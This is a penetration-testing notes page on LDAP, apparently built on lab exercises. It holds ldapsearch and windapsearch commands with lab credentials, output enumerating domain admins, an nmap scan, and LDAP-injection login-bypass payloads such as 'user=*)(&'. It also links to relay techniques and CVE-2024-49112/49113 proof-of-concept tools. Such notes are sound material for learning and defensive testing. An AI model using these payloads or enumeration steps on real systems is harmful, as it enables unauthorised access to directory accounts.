LDAP (389)

Godap

LogoGitHub - Macmod/godap: A complete TUI for LDAP.GitHub

Ldapsearch

 ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "(mail=john.doe@example.com)"
root@Host-001:~# ldapsearch -h 10.10.10.175 -x -s base namingcontexts
Logoldapsearch Examples - Sun OpenDS Standard Edition 2.0 Administration Guide

Windapsearch

$ python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 u:INLANEFREIGHT\forend
[+] Attempting to enumerate all Domain Admins
[+] Using DN: CN=Domain Admins,CN=Users.CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[+]	Found 28 Domain Admins:

cn: Administrator
userPrincipalName: administrator@inlanefreight.local

cn: lab_adm

cn: Matthew Morgan
userPrincipalName: mmorgan@inlanefreight.local

<SNIP>

Privileged Users

$ python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]     ...success! Binded as:
[+]      u:INLANEFREIGHT\forend
[+] Attempting to enumerate all AD privileged users
[+] Using DN: CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[+]     Found 28 nested users for group Domain Admins:

cn: Administrator
userPrincipalName: administrator@inlanefreight.local

cn: lab_adm

cn: Angela Dunn
userPrincipalName: adunn@inlanefreight.local

cn: Matthew Morgan
userPrincipalName: mmorgan@inlanefreight.local

cn: Dorothy Click
userPrincipalName: dclick@inlanefreight.local

<SNIP>

[+] Using DN: CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[+]     Found 3 nested users for group Enterprise Admins:

cn: Administrator
userPrincipalName: administrator@inlanefreight.local

cn: lab_adm

cn: Sharepoint Admin
userPrincipalName: sp-admin@INLANEFREIGHT.LOCAL

<SNIP>

LDAP Enumeration

LogoLDAP enumeration in 2025 – still viable for Red Teaming - 2ns2ns
Enumeration from Windows Host

LDAP Injection

Input
Description

*

An asterisk * can match any number of characters.

( )

Parentheses ( ) can group expressions.

|

A vertical bar | can perform logical OR.

&

An ampersand & can perform logical AND.

(cn=*)

Input values that try to bypass authentication or authorisation checks by injecting conditions that always evaluate to true can be used. For example, (cn=*) or (objectClass=*) can be used as input values for a username or password fields.

nmap -p- -sC -sV --open --min-rate=1000 10.129.204.229

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 14:43 SAST
Nmap scan report for 10.129.204.229
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.73 seconds

Attempting to log in using a wildcard character (*) in the username and password fields grants access to the system, effectively bypassing any authentication measures that had been implemented. 

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

More Payload:

LogoLDAP InjectionHackTricks

LDAP Signing

nxc ldap DC_IP -u username -p password -M ldap-checker

LDAP Signing NOT Enforced => RBCD or Shadow Credentials

LogoNTLM Relaying - Making the Old New Again | JUMPSEC LABSJUMPSEC LABS

Create Custom Wordlist

LogoGitHub - p0dalirius/pyLDAPWordlistHarvester: A tool to generate a wordlist from the information present in LDAP, in order to crack passwords of domain accounts.GitHub

LDAPNightmare

LogoGitHub - SafeBreach-Labs/CVE-2024-49113: LdapNightmare is a PoC tool that tests a vulnerable Windows Server against CVE-2024-49113GitHub
LogoGitHub - bo0l3an/CVE-2024-49112-PoC: CVE-2024-49112 LDAP RCE PoC and Metasploit ModuleGitHub

LDAP Obfuscation

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

  • Nmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.

  • The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.

  • Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousKerberos (88)NextMSSQL (1433)

Last updated